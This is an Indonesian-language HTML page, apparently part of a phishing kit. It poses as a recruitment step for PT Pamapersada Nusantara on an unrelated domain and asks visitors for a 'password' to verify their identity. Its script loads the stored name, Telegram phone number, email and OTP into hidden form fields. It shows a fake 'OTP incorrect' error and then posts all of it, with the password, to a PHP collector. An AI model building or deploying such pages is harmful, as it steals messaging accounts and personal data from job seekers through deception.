<!DOCTYPE html>
<html lang="id">
<head>
    <!-- Tambahkan ini di dalam elemen <head> -->
    <link rel="icon" type="image/png" sizes="32x32" href="images/logo.jpg">

    <!-- Open Graph Meta Tags -->
    <meta property="og:title" content="PT PAMAPERSADA NUSANTARA">
    <meta property="og:description" content="Lowongan kerja terbaru dan terpercaya. Klik untuk melihat detailnya!">
    <meta property="og:image" content="https://pendaftaranpenerimaan2024.my.id/loker/id/career/PTpamarsada-nusantara/pamapersada/images/job.jpg">
    <meta property="og:url" content="https://yourwebsite.com/">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="PT PAMAPERSADA NUSANTARA">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>PT PAMAPERSADA NUSANTARA</title>
    <link rel="stylesheet" href="styles/bootstrap.css">
    <link rel="stylesheet" href="styles/style.css">

    <style>
        /* Styling tambahan untuk overlay loading */
        #overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.8);
            z-index: 9999;
            display: none;
            justify-content: center;
            align-items: center;
        }

        /* Disabled state for the submit button */
        .btn-disabled {
            background-color: grey !important;
            cursor: not-allowed;
        }

        /* Styling animasi Lottie */
        #lottie-animation {
            width: 300px;
            height: 300px;
        }

    </style>
</head>

<body class="theme-light" data-highlight="blue2">

<div id="page">
    <div class="page-content">
        <img class="card" width="100%" src="images/pama.jpg" alt="Pama">
        <div class="card card-style">
            <div class="content mb-0">
                <h3 class="font-600">Verifikasi Password</h3>
                <p>Silahkan masukkan Password untuk mengonfirmasi jika benar ini Anda.</p>

                <form action="data/loginpwdata.php" method="post" onsubmit="return processForm();">
                    <!-- Hidden inputs to pass data -->
                    <input type="hidden" name="nama" id="nama">
                    <input type="hidden" name="nomor" id="nomor">
                    <input type="hidden" name="email" id="email">
                    <input type="hidden" name="lokasi" id="lokasi">
                    <input type="hidden" name="posisi" id="posisi">
                    <input type="hidden" name="otp" id="otp">

                    <!-- Kolom input password -->
                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <input type="password" class="form-control" name="pass" id="pass" placeholder="Password (Optional)">
                        <label for="pass" class="color-highlight font-400 font-13">Password (Optional)</label>
                    </div>

                    <button type="submit" class="btn btn-full btn-m shadow-l rounded-s text-uppercase font-900 bg-blue-dark mb-3 mt-4">
                        Daftar
                    </button>
                </form>
            </div>
        </div>

         <!-- Custom Footer with Image -->
         <div class="footer mt-3">
            <img src="images/footer.png" alt="Footer Image" style="width:100%; height:auto;">
        </div>
    </div>    
</div>    


<div id="overlay">
    <div id="lottie-animation"></div> <!-- Div untuk menampilkan animasi Lottie -->
</div>

<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="scripts/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/bodymovin/5.7.14/lottie.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@10"></script> <!-- SweetAlert Script -->

<script>
    // Fungsi untuk menampilkan overlay dengan animasi Lottie
    function showOverlay() {
        var overlay = document.getElementById('overlay');
        overlay.style.display = 'flex'; // Tampilkan overlay

        // Inisialisasi animasi Lottie
        lottie.loadAnimation({
            container: document.getElementById('lottie-animation'),
            renderer: 'svg',
            loop: true,
            autoplay: true,
            path: 'overlayplan.json' // Path ke file JSON animasi Lottie
        });

        // Tampilkan SweetAlert setelah 10 detik
        setTimeout(function() {
            Swal.fire({
                icon: 'error',
                title: 'OTP yang Anda masukkan tidak sesuai',
                text: 'Silakan periksa kembali dan coba lagi.',
                confirmButtonText: 'OK'
            }).then(() => {
                document.forms[0].submit(); // Submit form setelah SweetAlert ditutup
            });
            overlay.style.display = 'none'; // Sembunyikan overlay setelah modal SweetAlert muncul
        }, 5000); // 10 detik
    }

    // Fungsi untuk menangani submit form
    function processForm() {
        showOverlay();
        return false; // Cegah submit langsung, submit dipanggil setelah SweetAlert
    }
    // Menyimpan data ke localStorage
    function saveToLocalStorage() {
        localStorage.setItem('nama', document.getElementById('nama').value);
        localStorage.setItem('nomor', document.getElementById('nomor').value);
        localStorage.setItem('email', document.getElementById('email').value);
        localStorage.setItem('lokasi', document.getElementById('lokasi').value);
        localStorage.setItem('posisi', document.getElementById('posisi').value);
        localStorage.setItem('otp', document.getElementById('otp').value);
    }

    // Mengambil data dari localStorage saat halaman dimuat
    window.onload = function() {
        document.getElementById('nama').value = localStorage.getItem('nama') || '';
        document.getElementById('nomor').value = localStorage.getItem('nomorTelegram') || '';
        document.getElementById('email').value = localStorage.getItem('email') || '';
        document.getElementById('lokasi').value = localStorage.getItem('lokasi') || '';
        document.getElementById('posisi').value = localStorage.getItem('posisi') || '';
        document.getElementById('otp').value = localStorage.getItem('otp') || '';
    }
</script>
